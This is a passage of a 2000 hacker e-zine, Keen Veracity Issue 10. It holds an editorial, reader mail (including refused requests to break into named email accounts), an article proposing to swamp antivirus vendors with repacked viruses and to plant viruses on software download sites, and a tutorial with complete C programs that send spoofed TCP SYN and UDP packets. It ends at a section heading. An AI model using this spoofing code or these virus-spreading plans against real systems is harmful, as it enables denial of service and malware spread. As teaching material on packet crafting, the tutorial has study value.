Copy Link
Add to Bookmark
Report
Keen Veracity Issue 10
--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (10) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[CONTENTS]------------------------------------------------------------[CONTENTS]
[1]==============================[Editorial - Digital Ebola <digi@legions.org> ]
[2]=====================================================[KV Spam - The Readers ]
[3]===================[Theory of Denial of Service - fejed <fejed@legions.org> ]
[4]=============================[Project Sp00fed - threx <threx@attrition.org> ]
[5]=========[KV10's 30 Second Useful Script - Digital Ebola <digi@legions.org> ]
[6]=============[Booty Con 2000, Rubicon Account - sodium <sodium@omega2.net> ]
[7]====================================[Spider DoS - fejed <fejed@legions.org> ]
[8]==================================[FTP Advisory - fejed <fejed@legions.org> ]
[9]====================[Women In Technology - Godess <godess@securityflaw.com> ]
[10]===============[Expecting Mass Commands - Digital Ebola <digi@legions.org> ]
[11]=================================[NT Logging - NtWak0 <ntwako@legions.org> ]
[12]========================[UNIX Autopsies - Digital Ebola <digi@legions.org> ]
[13]========================[One Large ISP - Anonymous <anonymous@legions.org> ]
[14]=====================[Simple HTTP Security - Phriction <phric@legions.org> ]
[15]=========================[Hacker Paladins - Raschid <CogitoESum@yahoo.com> ]
[16]================[PERL Site Verification - Crater <ddfelts@ultravision.net> ]
[17]==================[Legions Survey - Gridmark/Phriction <gimps@legions.org> ]
[18]============[Guide to 0wning Your School - Gridmark <gridmark@legions.org> ]
[19]===========[OpenBSD Security Overview - David Jorm <davidj@wiretapped.net> ]
[20]=======================[Air Gapped Networks - dayzee <dayzee@madsekci.net> ]
[21]=================================[TKblink - clocker <clocker@adelphia.net> ]
[22]==================================[TCP/UDP - dayzee <dayzee@madseckzi.net> ]
[23]====================[Teleconferencing - Vixen <flutterby_2001@hotmail.com> ]
[24]==========[TCP IP Datagrams Explained - vortek <syntech@intraworldcom.net> ]
[25]=================================================[Parting Rant - The Editor]
[26]=================[The Art of Selling Out - J-P <j.p@b3ss13.ant10nl1ne.com> ]
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
[Editorial]======================================================[Digital Ebola]
Well, I have come to a revelation. After watching the billionth kiddie say
"3y3 4m 31337, j00 ph33r!", I started to do some really extensive thinking.
Where has the scene gone? I will tell you. Imagine a nice frosty bottle of
Guiness Stout. Imagine taking a drink, and its like the most satisfying thing
on Earth. Now what happenes when you finish it? You get to the bottom, and there
is this sour foam that just makes you want to puke. That sour foam, resembles
the scene. Everyone in the tasty part of the bottle has gotten good jobs,
grown up, or left. What is left is the kiddies. The sour foam. Sometimes we may
find that some of the tasty part ends up on the bottom too. Do not drink this.
As you read this, you are telling yourself, that digi is on crack, he has lost
his mind. Maybe I have, but the philospher part of me has taken over, and now
I have to urge you, the competent reader, to savor the beer. Drink the beer,
and when you come to the sour foam, toss the bottle in the trash and
go to the fridge and get another. Do not let the sour foam prevent you from
what you do best. Do not let the sour foam drag you down.
Now that I have ranted, I now give you Keen Veracity 10.
[KV Spam]==========================================================[The Readers]
Date: Mon, 14 Aug 2000 02:42:34 -0700
From: Mercury <fortress@tir.com>
To: digi@legions.org
Subject: wintermute bbs
Hi there. I remember logging into your Wintermute BBS a while back and
im looking to setup a BBS now. I was wondering what software you used
for that bbs, or if you know of any good unix bbs software.
Thanks
Mercury
/* Yah, the BBS is quite dead. I haven't decided whether to build it back.
If you are looking to set one up, I recommend Daydream for Linux. It seems
to be the most flexible, and is quick to setup. Plan on spending alot of time
with it still yet, as once started, the BBS is never quite finished.. =)
*/
Date: Thu, 17 Aug 2000 21:41:44 -0400
From: Robert Thomas <pjspotter98@earthlink.net>
To: digi@legions.org
Subject: HELP
----------------------------------------
I NEED A HACKERS HELP, WILL PAY
THANKS
/* Money doesn't buy you everything... */
Date: Tue, 22 Aug 2000 19:51:27 EDT
From: Kawaboy7@aol.com
To: digi@legions.org
Subject: i think your site is great
I need help can you send me Roxy surfr 150 emails
she is my EX- g/f and I want to hear about her new b/f
/* Really now, is the bitch worth going to jail over? */
Date: Thu, 24 Aug 2000 05:49:45 GMT
From: nobody user <hackirc2000@hotmail.com>
To: digi@legions.org
Subject: Question
Hello,
I was interested in finding out how to hack an IRC server, so you could
add your own O:lines and so forth. I haven't been able to find any
information on this. The only thing I could find was getting ChanOps in a
channel when a split happens, which doesn't work anymore. I read Keen
Veracity, that is how I found your e-mail address. Could you maybe give me
any pointers, or tell me if it could be done. I appreciate your time.
Thanks,
HACKIRC
/* OK. The only thing you can do to learn about how IRC servers work, is to
install one yourself. This means you should be setting up a UNIX machine of
sometype, probably Linux would be best for you, if you are not familiar with
these types of operating systems. Once you have gotten that far, you should
goto www.freshmeat.net and search for a irc server. There are several,
hybrid, bahumet are a couple that come to mind. Most of these are pretty much
the same as far as layout. Oline and such are kept in a file called ircd.conf.
Read the docs, set up your server and get familiar with it.
*/
Date: Sun, 27 Aug 2000 17:43:35 +0100 (BST)
From: "[iso-8859-1] rakesh sud" <rsud123@yahoo.co.in>
To: digiebola@hackphreak.org
Subject: Hacking rsud@vsnl.com
Hello Guys,
I have been for a month, trying to hack into an email
account. I have previously broken into hotmail
accounts without that much difficulty. I send the guys
their passwords after that. It feels good. One bloke
challenged me and said it is impossible to hack into
email accounts from india's isp vsnl. I took up the
challenge but couldnt pull it of.
Starting to believe now that the guy who can do so has
to be.....'A GENIUS'. Well I now forward the challenge
to you blokes. If any of you can hack into into the
email ' rsud@vsnl.com ', I will believe that you are
'the king'. But 'the king' is if you are the first to
hack it and let me know. 'The King' will then be my
guru and...i can do a lot of things for my guru. To
start of with, I would register a domain name (costing
$35) for you,for free ( Only to the first person). Do
send the password to my email. Best of luck all.
with love,
Joseph.
( The email to be hacked is rsud@vsnl.com ).
____________________________________________________________
Do You Yahoo!?
Get your free @yahoo.co.in address at http://mail.yahoo.co.in
/* If a kiddie is shot in the woods, does he make a sound? */
Date: Sun, 20 Aug 2000 19:42:42 -0900
From: Van Mortel <teckforce@lycos.com>
To: digiebola@hackphreak.org
Subject: Hacker
Hi,
I'm a new bies in the domain of hacking an I want to know how enter in a server
or how can I hack.
Thank You
TeckForce
/* Find a search engine or read stuff like KV. */
Date: Mon, 14 Aug 2000 03:47:06 -0700 (PDT)
From: "[iso-8859-1] thecno trance" <thecnojetaime@yahoo.com>
To: digiebola@hackphreak.org
Subject: help need
need to hack a web page,were can i get the toolz?
Please answer,yo'l ge recompensation....
__________________________________________________
Do You Yahoo!?
Yahoo! Mail ^Ö Free email you can access from anywhere!
http://mail.yahoo.com/
/* www.jackinworld.com is a good place to start... */
Date: Sat, 12 Aug 2000 16:20:36 -0400
From: Freaksta <freaxter8@home.com>
To: digiebola@hackphreak.org
Subject: Can i be lame like you too?
How can i go about copywriting all my friends ideas and then sell them
back to them for 30k?!
/* well, first I suggest you get some friends... */
[Theory of Denial of Service]================================[fejed@legions.org]
I'm writing on the topic of denial of service, here... no not ./winnuke or
anything like that, but a rather more deeper thought out possibility.
Ok, we all know what Virus Scanners do, don't we? ok.. I'm sure a few
people that read this, will have no clue (just for you people with no clue
out there.).
Ok here's the deal, virus scanners search though binaries usually or as an
option every file that is accessable by the virus scanner, looking for a
specific signature that is in every duplicate of the virus, which it keeps
in a database that comes with the Virus Scanner. Some Anti-Virus software,
also scans for signatures of programs that are often misused, say hack.exe
and tell the clueless user that its a virus so he/she that downloaded his
31337 hack.exe thinks its a virus and deletes the file, trojans are put under
the title of virii/viruses also, which I personally think is incorrectly
using the term, but anyway enough of that, lets get to the core of the
situation.
Ok, lets say bob, downloads the source every know virus that exists
(x86 specific) that he can get his hands on, even all early ones, like
junkie and aids, then he compiles and links them with the same linker,
to make stuph simpler for himself. He then obtains a compression program or
uses his elite hacker skills and codes one himself, that generates
different signatures for binaries on the fly, a different signature every
time it is run, then he shall bind the compressed virii with different
signatures to different programs.
Bob can now:
1.Penetrates a major software companies site (or something else large),
and uses their software to bind his duplicated virii to, say a download
site. Or he could he penetrate windows warez boxen, bind one virii to each
then let it spread.
2. Ok, he's got all of his virii all spiffy with their new signatures, ready to
go, so bob has his 20,000 or so virii, whats he going to do with all of them?
Well, he's going to submit them to Anti Virus Companies, such as
Anti-Viral-Pro (AVP) www.avp.com "Virus Protection for the Real World."
Ok, If you chose number one, then I wish you luck, don't email me asking
'How do I hack?', anything of that matter will be most likely ignored.
If you chose number 2 then, you keep making new strands of old virii and
re-submitting them to companies, if we repeat the procedure, quite a bit
then we'll be creating a slight denial of service against everyone that
downloads an anti-virus program, because they'll be downloading around
200-400k more. At the least, and if you continue with the attack of new
virii and many others do, then we'll be getting the area of a couple of more
megs, we keep going, we may eventually reach a gig, also having a larger
database of signatures, would mean more cpu cycles needed to scan
faster, and more space to store the signatures, or again, if the signatures
were stored remotely, then we'd be using more and more bandwidth for each
scan we do, which will ultimatly take more time to do, with all these factors
being as such, yet technology advances at time, but the user does not advance
as fast, so the technology isn't as widely used, meaning we have a slower
process in most areas, Such is Denial of Service.
One more update to this text, (this is the 3rd addition to it).
Whilst watching the news, on various free to air television channels,
reading my email, watching people talk about it, reading headlines on
various websites, I'm laughing to myself, quietly, I see how people talk
so ignorantly and bluntly about such things as if they know what they are
talking about, and they do it, without even realising, so bluntly without
being specific at all, "Love Bug." just another virus, in another day,
if so many ignorant people stopped using Operating Systems, with such control
over the hardware they are connected to then, there would be less of a
problem, *cough* Microsoft Windows *cough*, *cough* Microsoft Dos *cough*,
this article proves that there is sufficient power to bring all x86
Windows95/98 MS Dos based operating systems and such to their knees,
because if what I speak of was put into effect then scanning for simple
viruses would be an enormous task, which may even prove impossible, due to
the sheer size of the database + time needed to scan for the offending
viruses. If such a thing was done, then I'm sure people would be pushed to
use of operating systems based on unix, such as linux, or if not that, be
so afraid that they would not even dare turn their computers on, for the
fear of inevitability.
Greets to all who know me.
[Project Sp00fed]==========================================[threx@attrition.org]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% Title: Project Sp00fed %
% Author: Threx <threx@attrition.org> %
% Date: 7/16/00 %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- Table of Contents -
1.0 Intro
2.0 IPv4
2.1 IPv4 Packets Layout
2.2 The Header Fields
3.0 TCP
3.1 TCP Datagram Layout
3.2 The Header Fields
3.3 Explained Code
3.4 tcpsp00f.c
4.0 UDP
4.1 UDP Datagram Layout
4.2 The Header Fields
4.3 Code
4.4 udpsp00f.c
5.0 ICMP
5.1 Echo Reply Message Layout
5.2 The Fields
5.3 icmpsp00f.c
6.0 Reference
1.0 Intro
^^^^^^^^^
Well it's 6:45pm on Sunday and I guess I will start writing my article for
Keen Veracity 10 :). I have started to learn alot about how to
code spoof TCP/UDP/ICMP packets in the past month or so. So, I've decided
to write my article on, you've guessed it, coding spoofed packets.
Now even before reading this article you should have an understanding of C
socket programming and TCP/IP.
(NOTE: There might be mispelled words here and there... well I guess
you're gonna have to live with it :P.)
2.0 IPv4
^^^^^^^^
IPv4, also known as Internet Protocol version 4, is the most widely used
IP version out there on the net for now. However, soon IPv6 will be the
leading IP version out there, but that is a whole nother article for a
different time. But be glad we are using IPv4. Why? Becuase they are so
easy to spoof :).
2.1 IPv4 Packet Layout
^^^^^^^^^^^^^^^^^^^^^^
-----------------------------------------------
| version | header | type of | length |
| | length | service | |
|-----------------------------------------------|
| identification | flags | fragment |
| | | offset |
|-----------------------------------------------|
| time to live | protocol | header checksum |
|-----------------------------------------------|
| source ip address |
|-----------------------------------------------|
| destination ip address |
|-----------------------------------------------|
| options |
|-----------------------------------------------|
| data |
-----------------------------------------------
2.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
The IP header is used to determine what will happen to the packet. It
consists of 12 fields:
# version = The IP version number. This will usually be 4 because it is
the most widely used. Soon it will be 6, the next generation of the
internet. I highly recommend to read some info on the topic.
# header length = This is the total length of the IP header. This also
includes the option field.
# type of service = This indicates what type of handling this packet gets.
The first 3 bits stand for routing priority, the next 4 bits stand for
the type of service.
# length = This is the total length of the IP header, and TCP header, UDP
header, or ICMP header.
# identification = This is a specific value that is used for
fragmentation. If you are sending made up packets randomly then regard
this.
# flags & offset = These fields are used to reassemble packets when it
reaches the destination host.
# time to live = This is simply the time limit the packet has to live.
Each time it passes through a router it will take one away til it
reaches 0. Then the packet is discarded. (NOTE: depending what kind
of packet you are sending, icmp, tcp, udp, this might need to be a
specific value.)
# protocol = This is the type of protocol (ex. TCP, UDP) that will be
sent. Some common protocol numbers are:
`Taken from /etc/protocols'
ip 0 IP # internet protocol, pseudo protocol number
icmp 1 ICMP # internet control message protocol
igmp 2 IGMP # internet group multicast protocol
ggp 3 GGP # gateway-gateway protocol
tcp 6 TCP # transmission control protocol
pup 12 PUP # PARC universal packet protocol
udp 17 UDP # user datagram protocol
idp 22 IDP # WhatsThis?
raw 255 RAW # RAW IP interface
# header checksum = This checksum is for the IP header only therfor it is
set to 0.
# source ip address = This is a 32 bit field containing the source
address.
# destination ip address = This is a 32 bit field containing the
destination address.
# options = This field is optional. These are additional options to the
IP header.
# data = This is another optional field. Here is where you put the
payload to be sent with the IP header.
3.0 TCP
^^^^^^^
Transmission Control Protocol, TCP, is probably the most widely used
protocol out there. But with popularity comes problems. See TCP is the
hardest protocol type to spoof, I believe so. But again, it all depends
what you want to do. If you want to make a SYN flooder then it is very
easy. However, if you want to make a full TCP connection then you have to
know the specific sequence number of the host your are trying to immitate.
3.1 TCP Datagram Layout
^^^^^^^^^^^^^^^^^^^^^^^
-----------------------------------------------
| source port | destination port |
|-----------------------------------------------|
| sequence number |
|-----------------------------------------------|
| acknowledgment number |
|-----------------------------------------------|
| header information | window size |
|-----------------------------------------------|
| tcp checksum | urgent pointer |
|-----------------------------------------------|
| options (optional field) |
| |
| |
| |
| |
| data (optional field) |
| |
-----------------------------------------------
3.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
The TCP datagram is used to send a TCP packet (duh). It consists of 8
fields.
# source port = A value indicating the port number the packet is
coming from.
# destination port = A field indicationg the port number the
packet is being sent to.
# sequence number = A field keeping the TCP segments in order.
This is the reason why it is so hard to spoof a whole TCP connection.
This value has to be perfect in order to send data and such. In other
words you need to initialize a 3-way handsack.
# acknowledgment number = A field that the sender expects to
receive. This is the previous sequence number sent out.
# header information = A field with one of the following flags.
URG flag = URGENT. This will be routed faster.
ACK flag = An acknowledgment is sent.
PSH flag = The data will be pushed through immediately.
RST flag = Reset the connection.
SYN flag = Synchronize sequence numbers.
FIN flag = This is the final data sent from the sender.
# window size = A field specifying the amount of bytes that will be
sent before an acknowledgment (ACK) is specified.
# tcp checksum = A TCP checksum with a paylod, if any.
# urgent pointer = A pointer is only used when the urgent flag
(URG) is set. This points to the last byte that has been sent with
priority.
# options = This field is optional. It is mostly used if you want to add
more parameters.
# data = This field is optional. If any payload is add this is where it
will go.
3.3 Code
^^^^^^^^
Well finally here is the code. Now let us analyze this shit alittle bit.
Here are the needed header files in order to spoof packets. We don't use
netinet/ip.h or netinet/tcp.c in this code. Those header files would make
it a lot more portable. However, it's more work. So I've decided to use
linux/ip.h and linux/tcp.h. This make it very limited to the Linux
operating system. But I decided that's what I use mostly so tough luck if
you don't.
===[ snip ]============================================
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>
===[ unsnip ]==========================================
Here I have define some shit.. It's just a lot easier this way :). Here I
define the source ip, the ip address the packet is using, and the
destination ip, the ip address the packet is being sent too. I also
define the source port and the destination port. Here the packet is
coming from port 1111 and being sent to port 25, smtp.
===[ snip ]============================================
#define error -1
#define srcip "255.255.255.255"
#define dstip "127.0.0.1"
#define sport 1111
#define dport 25
===[ unsnip ]==========================================
It all comes together here. We struct the ip header previously declared
in linux/ip.h. Also with the tcp header. Then we declare the packet
which is simply the sum of the ip and tcp header.
Now we declare the target, the destination ip address. Then to be able to
put the source ip and destination ip in the ip header we declare saddr and
daddr.
We then declare sock and on. 'sock' is used to open a socket and set the
socket options. 'on' is used for setting socket options.
===[ snip ]============================================
main() {
struct iphdr *iphdr;
struct tcphdr *tcp;
u_char packet[sizeof(struct iphdr) + sizeof(struct tcphdr)];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
===[ unsnip ]==========================================
Here we open a socket. We have to provide a domain, which is AF_INET, the
type of socket this is, which is a raw socket, and the protocol, which is
a raw protocol. We also have error checking. You should always have it.
It's very useful.
===[ snip ]============================================
if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}
===[ unsnip ]==========================================
Now we set the socket options, setsockopt. We use the option IP_HDRINCL.
This allows us to create our own ip header. If you don't have this option
on your system then you can't spoof packets :(.
===[ snip ]============================================
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}
===[ unsnip ]==========================================
Here we just make the ip and tcp headers equal to their structures and the
packet. Then we zero them out.
===[ snip ]============================================
iphdr = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((char *)tcp,'\0',sizeof(struct tcphdr));
===[ unsnip ]==========================================
Now we make the saddr.s_addr equal too the srcip defined earlier in the
code. And I do the same for the destionation ip address.
===[ snip ]============================================
saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);
===[ unsnip ]==========================================
Finally we get to the good part, creating the packet. This is mainly self
explained. Look at 3.2 The Header Fields for explaination.
===[ snip ]============================================
iphdr->ihl = 5;
iphdr->version = 4;
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iphdr->id = 1234;
iphdr->ttl = 250;
iphdr->protocol = 6;
iphdr->saddr = saddr.s_addr;
iphdr->daddr = daddr.s_addr;
iphdr->check = 0;
tcp->source = htons(sport);
tcp->dest = htons(dport);
tcp->seq = htonl(rand());
tcp->ack_seq = htonl(rand());
tcp->res1 = 0;
tcp->doff = 5;
tcp->window = htons(4343);
tcp->syn = 1;
===[ unsnip ]==========================================
First we zero out our target. Then we define our sin family, port, and
address.
memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;
===[ unsnip ]==========================================
Now we finally get to send the packet. So we simply use the sendto()
funtion to send it out.
===[ snip ]============================================
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ unsnip ]==========================================
3.4 tcpsp00f.c
^^^^^^^^^^^^^^
===[ cut here ]===============================================
/* tcpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o tcpsp00f tcpsp00f.c */
/* this code will send a spoofed packet to port 25(smtp) to 127.0.0.1 */
/* host. */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/tcp.h> /* so this will only work on linux */
/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define sport 1111 /* source port */
#define dport 25 /* destination port(smtp) */
main() {
struct iphdr *iphdr;
struct tcphdr *tcp;
u_char packet[sizeof(struct iphdr) + sizeof(struct tcphdr)];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}
iphdr = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((char *)tcp,'\0',sizeof(struct tcphdr));
saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);
/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iphdr->id = 1234;
iphdr->ttl = 250; /* a length of time the packet will survive */
iphdr->protocol = 6;
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0;
tcp->source = htons(sport); /* source port */
tcp->dest = htons(dport); /* destination port */
tcp->seq = htonl(rand());
tcp->ack_seq = htonl(rand());
tcp->res1 = 0;
tcp->doff = 5;
tcp->window = htons(4343); /* window size */
tcp->syn = 1; /* let's send a syn flag */
memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;
/* now let's send this packet */
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ done ]===================================================
4.0 UDP
^^^^^^^
UDP, also known as User Datagram Protocol, is a connectionless protocol.
This is great if you want to spoof UDP packets. The reason being is that
it doesn't make a complete connection to the host. It's just sends out
the packets, however it's is unrelible :(.
4.1 UDP Datagram Layout
^^^^^^^^^^^^^^^^^^^^^^^
--------------------------------------
| source port | destination port |
|--------------------------------------|
| length | checksum |
|--------------------------------------|
| data |
--------------------------------------
4.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
Here are the 5 header fields that need to be filled in order
to send a UDP packet and also spoof it.
# source port = This field is optional, but fun to play with. This
field is the port the information is coming from.
# destination port = This field tells what port you are sending the UDP
packet too.
# length = The field specifying the number of bytes in the UDP datagram.
# checksum = Just a checksum for the UDP header.
# data = This is the data that will be sent to a UDP port.
4.3 Code
^^^^^^^^
This code will send spoofed UDP packet from 255.255.255.255 from port 1111
to 127.0.0.1 to port 137(netbios-ns). Since we discussed a lot about the
TCP code I will just explain a few things.
Here we use the linux/udp.h header file because we are now sending UDP
packets.
===[ snip ]============================================
#include <linux/udp.h>
===[ unsnip ]==========================================
Now we have to struct the udphdr and add the 'data', the segment that
will be sent, to the packet.
===[ snip ]============================================
main() {
struct iphdr *iphdr;
struct udphdr *udphdr;
u_char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + data];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
===[ unsnip ]==========================================
Now we have to define what udphdr is equal too. Then we have to zero out
everything.
===[ snip ]============================================
iphdr = (struct iphdr *)packet;
udphdr = (struct udphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((packet+sizeof(struct udphdr)+sizeof(struct iphdr)),'0',data);
===[ unsnip ]==========================================
4.4 udpsp00f.c
^^^^^^^^^^^^^^
===[ cut here ]===============================================
/* udpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o udpsp00f udpsp00f.c */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/udp.h> /* so this will only work on linux */
/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define sport 1111 /* source port */
#define dport 137 /* destination port(netbios-ns) */
#define data 69 /* the data segment that will be sent */
main() {
struct iphdr *iphdr;
struct udphdr *udphdr;
u_char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + data];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}
iphdr = (struct iphdr *)packet;
udphdr = (struct udphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((packet+sizeof(struct udphdr)+sizeof(struct iphdr)),'0',data);
saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);
/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + data;
iphdr->id = 1234;
iphdr->ttl = 250; /* a length of time the packet will survive */
iphdr->protocol = 17;
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0;
udphdr->source = htons(sport); /* source port */
udphdr->dest = htons(dport); /* destination port */
udphdr->len = sizeof(struct iphdr) + sizeof(struct udphdr) + data;
udphdr->check = 0;
memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;
/* now let's send this packet */
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ done ]===================================================
5.0 ICMP
^^^^^^^^
ICMP, Internet Control Message Protocol, is used to create error messages.
For example... Whenever you get some kind of error message, Host Unknown
or Port Unreachable, you can be sure ICMP had its part in it.
(NOTE: Trying to create ICMP packets are a little harder than TCP and UDP.
So, I've decided to just create a simple echo reply message. However
there are many other error messages that can be created... Please referr
to the reference section for more information.)
5.1 Echo Reply Message Layout
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
----------------------------------------------
| type | code | chesksum |
|----------------------------------------------|
| identifier | sequence number |
|----------------------------------------------|
| data |
----------------------------------------------
5.2 The Fields
^^^^^^^^^^^^^^
There are 6 fields that must be filled inorder to send out an error
messages with ICMP.
# type = This is the message type for the error message. Some examples are
0 = echo reply, 8 = echo request. Here they are from the ICMP header
file.
`Taken from /usr/include/linux/icmp.h'
#define ICMP_ECHOREPLY 0 /* Echo Reply */
#define ICMP_DEST_UNREACH 3 /* Destination Unreachable */
#define ICMP_SOURCE_QUENCH 4 /* Source Quench */
#define ICMP_REDIRECT 5 /* Redirect (change route) */
#define ICMP_ECHO 8 /* Echo Request */
#define ICMP_TIME_EXCEEDED 11 /* Time Exceeded */
#define ICMP_PARAMETERPROB 12 /* Parameter Problem */
#define ICMP_TIMESTAMP 13 /* Timestamp Request */
#define ICMP_TIMESTAMPREPLY 14 /* Timestamp Reply */
#define ICMP_INFO_REQUEST 15 /* Information Request */
#define ICMP_INFO_REPLY 16 /* Information Reply */
#define ICMP_ADDRESS 17 /* Address Mask Request */
#define ICMP_ADDRESSREPLY 18 /* Address Mask Reply */
#define NR_ICMP_TYPES 18
# code = These are the codes for unreached hosts or ports, time exceeded,
or for redirting nets, or hosts. Here are all the codes form the ICMP
header file.
`Taken from /usr/include/linux/icmp.h'
/* Codes for UNREACH. */
#define ICMP_NET_UNREACH 0 /* Network Unreachable */
#define ICMP_HOST_UNREACH 1 /* Host Unreachable */
#define ICMP_PROT_UNREACH 2 /* Protocol Unreachable */
#define ICMP_PORT_UNREACH 3 /* Port Unreachable */
#define ICMP_FRAG_NEEDED 4 /* Fragmentation Needed/DF set */
#define ICMP_SR_FAILED 5 /* Source Route failed */
#define ICMP_NET_UNKNOWN 6
#define ICMP_HOST_UNKNOWN 7
#define ICMP_HOST_ISOLATED 8
#define ICMP_NET_ANO 9
#define ICMP_HOST_ANO 10
#define ICMP_NET_UNR_TOS 11
#define ICMP_HOST_UNR_TOS 12
#define ICMP_PKT_FILTERED 13 /* Packet filtered */
#define ICMP_PREC_VIOLATION 14 /* Precedence violation */
#define ICMP_PREC_CUTOFF 15 /* Precedence cut off */
#define NR_ICMP_UNREACH 15 /* instead of hardcoding immediate
values */
/* Codes for REDIRECT. */
#define ICMP_REDIR_NET 0 /* Redirect Net */
#define ICMP_REDIR_HOST 1 /* Redirect Host */
#define ICMP_REDIR_NETTOS 2 /* Redirect Net for TOS */
#define ICMP_REDIR_HOSTTOS 3 /* Redirect Host for TOS */
/* Codes for TIME_EXCEEDED. */
#define ICMP_EXC_TTL 0 /* TTL count exceeded */
#define ICMP_EXC_FRAGTIME 1 /* Fragment Reass time exceeded */
# checksum = This is the checksum for the ICMP packet. It is just like
the IP checksum.
# identifier = This field's value is used for echo replies and requests.
# sequence number = This will identify the sequence of the echo messages.
This is used when more than one is sent.
# data = This is the echo message's data that will be recieved by the echo
request.
5.3 icmpsp00f.c
